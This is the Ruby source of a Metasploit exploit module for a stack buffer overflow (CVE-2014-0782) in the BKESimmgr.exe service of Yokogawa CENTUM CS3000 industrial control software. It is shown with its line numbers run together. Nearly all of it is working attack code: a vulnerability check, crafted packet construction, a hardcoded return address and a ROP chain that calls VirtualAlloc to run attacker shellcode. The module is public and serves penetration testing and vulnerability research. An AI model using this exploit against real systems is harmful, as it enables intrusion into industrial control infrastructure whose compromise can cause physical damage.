Path: blob/master/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',15'Description' => %q{16This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability17exists in the BKESimmgr.exe service when handling specially crafted packets, due to an18insecure usage of memcpy, using attacker controlled data as the size count. This module19has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows202003 SP2.21},22'Author' => [23'juan vazquez',24'Redsadic <julian.vilas[at]gmail.com>'25],26'References' => [27['CVE', '2014-0782'],28['URL', 'https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],29['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']30],31'Payload' => {32'Space' => 340,33'DisableNops' => true,34'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -350035},36'Platform' => 'win',37'Targets' => [38[39'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',40{41'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll42'Offset' => 64,43'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe44'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe45}46],47],48'DisclosureDate' => '2014-03-10',49'DefaultTarget' => 0,50'Notes' => {51'Reliability' => UNKNOWN_RELIABILITY,52'Stability' => UNKNOWN_STABILITY,53'SideEffects' => UNKNOWN_SIDE_EFFECTS54}55)56)5758register_options(59[60Opt::RPORT(34205)61]62)63end6465def check66data = create_pkt(rand_text_alpha(4))6768res = send_pkt(data)6970if res && res.length == 1071simmgr_res = parse_response(res)7273if valid_response?(simmgr_res)74check_code = Exploit::CheckCode::Appears75else76check_code = Exploit::CheckCode::Safe77end78else79check_code = Exploit::CheckCode::Safe80end8182check_code83end8485def exploit86bof = rand_text(target['Offset'])87bof << [target.ret].pack("V")88bof << [target['FakeArgument1']].pack("V")89bof << [target['FakeArgument2']].pack("V")90bof << rand_text(16) # padding (corrupted bytes)91bof << create_rop_chain92bof << payload.encoded9394data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B095data << [bof.length].pack("n")96data << bof9798pkt = create_pkt(data)99100print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")101connect102sock.put(pkt)103disconnect104end105106def create_rop_chain107# rop chain generated with mona.py - www.corelan.be108rop_gadgets =109[1100x004047ca, # POP ECX # RETN [BKESimmgr.exe]1110x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]1120x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]1130x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]1140x619436d3, # POP EBP # RETN [libbkeeda.dll]1150x61615424, # & push esp # ret [libbkeldc.dll]1160x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]1170x00000001, # 0x00000001-> ebx1180x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]1190x00001000, # 0x00001000-> edx1200x0040765a, # POP ECX # RETN [BKESimmgr.exe]1210x00000040, # 0x00000040-> ecx1220x6191aaab, # POP EDI # RETN [libbkeeda.dll]1230x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]1240x00405ffa, # POP EAX # RETN [BKESimmgr.exe]1250x90909090, # nop1260x619532eb # PUSHAD # RETN [libbkeeda.dll]127].pack("V*")128129rop_gadgets130end131132def create_pkt(data)133pkt = [0x01].pack("N") # Operation Identifier134pkt << [data.length].pack("n") # length135pkt << data # Fake packet136137pkt138end139140def send_pkt(data)141connect142sock.put(data)143res = sock.get_once144disconnect145146res147end148149def parse_response(data)150data.unpack("NnN")151end152153def valid_response?(data)154valid = false155156if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5157valid = true158end159160valid161end162end163164165